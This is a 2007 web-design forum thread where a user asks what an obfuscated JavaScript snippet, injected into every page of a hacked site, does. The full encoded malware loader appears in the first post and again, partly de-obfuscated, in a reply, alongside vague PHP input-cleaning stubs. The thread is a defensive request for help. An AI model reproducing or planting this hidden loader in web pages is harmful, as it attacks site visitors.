Not signed in (Sign In)

SkillShare - A place to discuss Web Standards and Web Design topics

Categories

Vanilla 1.1.9 is a product of Lussumo. More Information: Documentation, Community Support.

Anything Goes: Has anyone seen sites hacked with this before?

Bottom of Page

1 to 3 of 3

  1.  
    • CommentAuthoraconnor
    • CommentTimeSep 25th 2007
     permalink
    Recently, the script below started appearing on all of the pages on a friend's new site. Has anyone ever seen this before? Anyone know what it does?


    <!--[z0s]--><script>document.write(unescape("%3Cscript%3Eif%28eoY%21%3D1%29%7Bfunction%20UB%28DE%29%7Breturn%20DE%7Dtry%7Bvar%20yj%3D%27JJ0J50Jp0JZ0JK0J30JG0Jz0JC0JM0J60JW0JL0Jd0Jy0J40Jw0Jj0J70Jk0Jo0Jg0Ji0Jh0Jx0JU0JH0Js0Jf0Jl0Jq0JF0JB0JT0JA0JV0JN0JY0Jm0JD0Je0Jc0Ja0JP0Jn0Jt0JS0JO0Jr0JR0JI0Jb0J90J805J05505p05Z05K05305G05z05C05M05605W05L05d05y05405w05j05705k05o05g05i05h%27%3Bvar%20PC%3Dyj.substr%282%2C1%29%2CuL%3DArray%2825624%5E25853%2C23853%5E23943%2C15823%5E15733%2CgZ%28%27171%27%29%2CgZ%28%27176%27%29%2C3568%5E3417%2CgZ%28%27173%27%29%2CgZ%28%27231%27%29%2C19220%5E19371%2CgZ%28%27172%27%29%2CgZ%28%27183%27%29%2CgZ%28%27182%27%29%2CgZ%28%27249%27%29%2CgZ%28%27157%27%29%2CgZ%28%27128%27%29%2CgZ%28%27241%27%29%2CgZ%28%27158%27%29%2C12032%5E12221%2C26173%5E26281%2C21122%5E21111%2CgZ%28%27187%27%29%2CgZ%28%27184%27%29%2C20979%5E20847%2CgZ%28%27240%27%29%2C7365%5E7271%2CgZ%28%27175%27%29%2CgZ%28%27138%27%29%2C26976%5E27135%2C14673%5E14773%2CgZ%28%27188%27%29%2CgZ%28%27174%27%29%2CgZ%28%27154%27%29%2C1413%5E1335%2CgZ%28%27226%27%29%2C26492%5E26507%2CgZ%28%27141%27%29%2C975%5E891%2C13903%5E14065%2C11559%5E11733%2CgZ%28%27225%27%29%2CgZ%28%27239%27%29%2C12466%5E12383%2C27508%5E27549%2C21014%5E21229%2C4746%5E4651%2CgZ%28%27164%27%29%2C12571%5E12685%2C26439%5E26553%2C17667%5E17899%2CgZ%28%27137%27%29%2C21685%5E21565%2C28866%5E28791%2C17621%5E17533%2C1243%5E1099%2C2665%5E2719%2C4868%5E5045%2C19225%5E19437%2CgZ%28%27227%27%29%2CgZ%28%27248%27%29%2CgZ%28%27230%27%29%2CgZ%28%27139%27%29%2C26831%5E26701%2CgZ%28%27135%27%29%2C9248%5E9347%2CgZ%28%27224%27%29%2C5433%5E5565%2CgZ%28%27133%27%29%2C6635%5E6515%2C27917%5E28135%2CgZ%28%27155%27%29%2C27399%5E27559%2C588%5E671%2CgZ%28%27235%27%29%2CgZ%28%27131%27%29%2C28727%5E28891%2CgZ%28%27238%27%29%2C6268%5E6381%2C20440%5E20267%29%3Bvar%20Ou%2Ctm%3Bvar%20gV%2CKo%3D%27JJJ5JpJZJKJ3JGJzJCJMJ6JpJGJKJWJ6JLJ3JdJyJ4JwJjJ7JkJoJgJiJhJxJLJUJgJZJLJHJwJsJfJ6JlJqJLJdJgJGJlJ4JhJkJLJFJBJwJfJLJ6JlJqJLJdJgJGJlJ4JhJTJLJFJBJwJAJ5JlJGJVJKJNJlJ4JHJwJsJAJYJlJGJVJKJNJlJ4JhJmJDJeJcJaJaJaJaJaJhJTJLJjJWJpJMJNJlJ6JGJAJpJWJWJBJKJlJLJfJLJwJjJ7JmJPJfJPJmJlJ5JpJgJ3JlJ4JoJgJiJhJmJPJTJlJnJ3JKJZJlJ5JfJPJmJFJBJwJAJGJWJwJ7JVJHJGJZJKJ6JYJ4JhJTJLJtJUJgJZJLJnJSJsJfJOJ5JrJCJjJRJnJOJTJUJgJZJLJqJsJZJfJOJrJOJkJIJiJgJfJOJMJ3JjJgJGJlJrJAJpJbJgJ5J5JKJpJGJlJbJAJWJZJYJOJTJUJgJZJLJ9JIJ8JfJO5J55JGJNJb5JJOJTJKJCJ4JjJWJpJMJNJlJ6JGJAJpJWJWJBJKJlJAJKJ6JjJlJnJSJCJ4JnJSJsJmJOJfJOJmJqJsJZJhJLJfJf5pJrJhJxJUJgJZJLJjJb55JfJjJWJpJMJNJlJ6JGJAJbJWJpJgJGJKJWJ6JA55JWJ5JGJTJUJgJZJLJ9Jl55JfJLJO55JGJOJmJOJGJ35ZJOJmJO5J5JJOJmJ4JLJjJb55JL5KJfJLJOJO53JOJO5Z5GJMJyJ4JhJhJLJmJLJjJb55JAJZJlJ3JbJgJpJlJLJ45J5z5CJg5p5MJa5p56JA5p5W5JJkJOJAJOJhJAJZJlJ3JbJgJpJlJLJ45J5LJAJm5JJkJOJAJOJhJmJOJAJOJm5GJMJyJ4JhJLJmJOJAJOJLJmJLJIJiJgJmJ9JIJ8JTJUJgJZJL5MJpJdJfJjJWJpJMJNJlJ6JGJAJpJZJlJgJGJlJiJbJlJNJlJ6JGJ4JOJKJCJZJgJNJlJOJhJT5MJpJdJAJ5JlJG5dJGJGJZJKJoJMJGJlJLJ4JOJ5JZJpJOJkJLJ9Jl55JhJT5MJpJdJA55JlJKJY55JGJfJcJT5MJpJdJAJqJKJjJG55Jf5yJT5MJpJdJAJCJZJgJNJl54JWJZJjJlJZJLJfJLJaJTJLJGJZ5wJxJLJjJWJpJMJNJlJ6JGJAJoJWJj5wJAJgJ3J3JlJ6JjJF55JKJbJjJLJ4JL5MJpJdJhJTJLJ3JdJyJ4JnJSJsJkJLJqJsJZJLJhJTJtJLJpJgJGJp55J4JlJhJLJxJjJWJpJMJNJlJ6JGJAJqJZJKJGJlJLJ4JOJJ55JGJNJbJzJJJoJWJj5wJzJJ5JJoJWJj5wJzJJ5J55JGJNJbJzJOJhJTJLJjJWJpJMJNJlJ6JGJAJoJWJj5wJAJgJ3J3JlJ6JjJF55JKJbJjJLJ4JL5MJpJdJhJTJ3JdJyJLJ4JLJnJSJsJkJqJsJZJhJLJTJtJLJt5jJCJMJ6JpJGJKJWJ6JL5GJMJyJ4JhJxJLJUJgJZJLJSJpJHJf57JcJTJUJgJZJLJWJY5kJfJPJaJr575yJc5oJe5gJD56JaJgJoJpJjJlJCJPJkJY5iJNJfJPJPJTJLJCJWJZJ4JsJw54JfJaJTJLJsJw54JLJJJLJSJpJHJTJLJsJw54JmJmJhJLJY5iJNJmJfJLJWJY5kJAJ5JMJoJ5JGJZJ4J7JgJG55JAJCJbJWJWJZJ4J7JgJG55JAJZJgJ6JjJWJNJ4Jh5hJWJY5kJAJbJlJ6JYJG55JhJkJrJkJrJhJTJLJZJlJGJMJZJ6JLJY5iJNJTJLJtJJ5JJ5JpJZJKJ3JGJz%27%3Bvar%20sO%3DString%28%29%3Bfunction%20gZ%28Nt%29%7Breturn%20parseInt%28Nt%29%7Dyj%3Dyj.split%28PC%29%3Bfor%20%28Ou%3D0%3BOu%3CKo.length%3BOu+%3D2%29%7BgV%3DKo.substr%28Ou%2C2%29%3Bfor%28tm%3D0%3Btm%3Cyj.length%3Btm++%29%7Bif%28yj%5Btm%5D%3D%3DgV%29break%3B%7DsO+%3DString.fromCharCode%28uL%5Btm%5D%5E217%29%3B%7Ddocument.write%28sO%29%3B%7Dcatch%28GYM%29%7B%7D%7Dvar%20eoY%3D1%3C/script%3E"))</script><!--[/z0s]-->


    Also, can anyone recommend any tools for checking if a form is vulnerable to SQLInjection or Cross-site scripting?

    Thanks.
    • CommentAuthorMatt
    • CommentTimeSep 25th 2007 edited
     permalink 

    if(eoY != 1) {
       function UB(DE) {
          return DE}
       try {
          var yj = 'JJ0J50Jp0JZ0JK0J30JG0Jz0JC0JM0J60JW0JL0Jd0Jy0J40Jw0Jj0J70Jk0Jo0Jg0Ji0Jh0Jx0JU0JH0Js0Jf0Jl0Jq0JF0JB0JT0JA0JV0JN0JY0Jm0JD0Je0Jc0Ja0JP0Jn0Jt0JS0JO0Jr0JR0JI0Jb0J90J805J05505p05Z05K05305G05z05C05M05605W05L05d05y05405w05j05705k05o05g05i05h';
          var PC = yj.substr(2, 1), uL = Array(25624^25853, 23853^23943, 15823^15733, gZ('171'), gZ('176'), 3568^3417, gZ('173'), gZ('231'), 19220^19371, gZ('172'), gZ('183'), gZ('182'), gZ('249'), gZ('157'), gZ('128'), gZ('241'), gZ('158'), 12032^12221, 26173^26281, 21122^21111, gZ('187'), gZ('184'), 20979^20847, gZ('240'), 7365^7271, gZ('175'), gZ('138'), 26976^27135, 14673^14773, gZ('188'), gZ('174'), gZ('154'), 1413^1335, gZ('226'), 26492^26507, gZ('141'), 975^891, 13903^14065, 11559^11733, gZ('225'), gZ('239'), 12466^12383, 27508^27549, 21014^21229, 4746^4651, gZ('164'), 12571^12685, 26439^26553, 17667^17899, gZ('137'), 21685^21565, 28866^28791, 17621^17533, 1243^1099, 2665^2719, 4868^5045, 19225^19437, gZ('227'), gZ('248'), gZ('230'), gZ('139'), 26831^26701, gZ('135'), 9248^9347, gZ('224'), 5433^5565, gZ('133'), 6635^6515, 27917^28135, gZ('155'), 27399^27559, 588^671, gZ('235'), gZ('131'), 28727^28891, gZ('238'), 6268^6381, 20440^20267);
          var Ou, tm;
          var gV, Ko = 'JJJ5JpJZJKJ3JGJzJCJMJ6JpJGJKJWJ6JLJ3JdJyJ4JwJjJ7JkJoJgJiJhJxJLJUJgJZJLJHJwJsJfJ6JlJqJLJdJgJGJlJ4JhJkJLJFJBJwJfJLJ6JlJqJLJdJgJGJlJ4JhJTJLJFJBJwJAJ5JlJGJVJKJNJlJ4JHJwJsJAJYJlJGJVJKJNJlJ4JhJmJDJeJcJaJaJaJaJaJhJTJLJjJWJpJMJNJlJ6JGJAJpJWJWJBJKJlJLJfJLJwJjJ7JmJPJfJPJmJlJ5JpJgJ3JlJ4JoJgJiJhJmJPJTJlJnJ3JKJZJlJ5JfJPJmJFJBJwJAJGJWJwJ7JVJHJGJZJKJ6JYJ4JhJTJLJtJUJgJZJLJnJSJsJfJOJ5JrJCJjJRJnJOJTJUJgJZJLJqJsJZJfJOJrJOJkJIJiJgJfJOJMJ3JjJgJGJlJrJAJpJbJgJ5J5JKJpJGJlJbJAJWJZJYJOJTJUJgJZJLJ9JIJ8JfJO5J55JGJNJb5JJOJTJKJCJ4JjJWJpJMJNJlJ6JGJAJpJWJWJBJKJlJAJKJ6JjJlJnJSJCJ4JnJSJsJmJOJfJOJmJqJsJZJhJLJfJf5pJrJhJxJUJgJZJLJjJb55JfJjJWJpJMJNJlJ6JGJAJbJWJpJgJGJKJWJ6JA55JWJ5JGJTJUJgJZJLJ9Jl55JfJLJO55JGJOJmJOJGJ35ZJOJmJO5J5JJOJmJ4JLJjJb55JL5KJfJLJOJO53JOJO5Z5GJMJyJ4JhJhJLJmJLJjJb55JAJZJlJ3JbJgJpJlJLJ45J5z5CJg5p5MJa5p56JA5p5W5JJkJOJAJOJhJAJZJlJ3JbJgJpJlJLJ45J5LJAJm5JJkJOJAJOJhJmJOJAJOJm5GJMJyJ4JhJLJmJOJAJOJLJmJLJIJiJgJmJ9JIJ8JTJUJgJZJL5MJpJdJfJjJWJpJMJNJlJ6JGJAJpJZJlJgJGJlJiJbJlJNJlJ6JGJ4JOJKJCJZJgJNJlJOJhJT5MJpJdJAJ5JlJG5dJGJGJZJKJoJMJGJlJLJ4JOJ5JZJpJOJkJLJ9Jl55JhJT5MJpJdJA55JlJKJY55JGJfJcJT5MJpJdJAJqJKJjJG55Jf5yJT5MJpJdJAJCJZJgJNJl54JWJZJjJlJZJLJfJLJaJTJLJGJZ5wJxJLJjJWJpJMJNJlJ6JGJAJoJWJj5wJAJgJ3J3JlJ6JjJF55JKJbJjJLJ4JL5MJpJdJhJTJLJ3JdJyJ4JnJSJsJkJLJqJsJZJLJhJTJtJLJpJgJGJp55J4JlJhJLJxJjJWJpJMJNJlJ6JGJAJqJZJKJGJlJLJ4JOJJ55JGJNJbJzJJJoJWJj5wJzJJ5JJoJWJj5wJzJJ5J55JGJNJbJzJOJhJTJLJjJWJpJMJNJlJ6JGJAJoJWJj5wJAJgJ3J3JlJ6JjJF55JKJbJjJLJ4JL5MJpJdJhJTJ3JdJyJLJ4JLJnJSJsJkJqJsJZJhJLJTJtJLJt5jJCJMJ6JpJGJKJWJ6JL5GJMJyJ4JhJxJLJUJgJZJLJSJpJHJf57JcJTJUJgJZJLJWJY5kJfJPJaJr575yJc5oJe5gJD56JaJgJoJpJjJlJCJPJkJY5iJNJfJPJPJTJLJCJWJZJ4JsJw54JfJaJTJLJsJw54JLJJJLJSJpJHJTJLJsJw54JmJmJhJLJY5iJNJmJfJLJWJY5kJAJ5JMJoJ5JGJZJ4J7JgJG55JAJCJbJWJWJZJ4J7JgJG55JAJZJgJ6JjJWJNJ4Jh5hJWJY5kJAJbJlJ6JYJG55JhJkJrJkJrJhJTJLJZJlJGJMJZJ6JLJY5iJNJTJLJtJJ5JJ5JpJZJKJ3JGJz';
          var sO = String();
          function gZ(Nt) {
             return parseInt(Nt)}
          yj = yj.split(PC);
          for (Ou = 0; Ou < Ko.length; Ou = 2) {
             gV = Ko.substr(Ou, 2);
             for(tm = 0; tm < yj.length; tm ) {
                if(yj[tm] == gV)break;
                }
             sO = String.fromCharCode(uL[tm]^217);
             }
          document.write(sO);
          }
       catch(GYM) {
          }
       }
    var eoY = 1


    I am thinking there is more than just that to make the function work. I am no sure exactly what it does to be honest.
    • CommentAuthorPettyRider
    • CommentTimeSep 25th 2007 edited
     permalink
    I think you would just need to inspect the code that is receiving the form input to know. Typically, you filter all incoming content somewhere in the process of your scripts

    foreach ($_POST as $key => $dirty) {
    // Run routines to clean $dirty (search PHP sites for examples)
    $_POST[$key] = $dirty;
    }

    or perhaps more efficient is to clean only what is needed

    $username = clean_post('username');

    function clean_post($key) {
    $item = $_POST[$key];
    // Clean $item
    return $item;
    }

1 to 3 of 3

  1.  
Add your comments
    Username Password
  • Format comments as (Help)
 
Back to Discussions Top of Page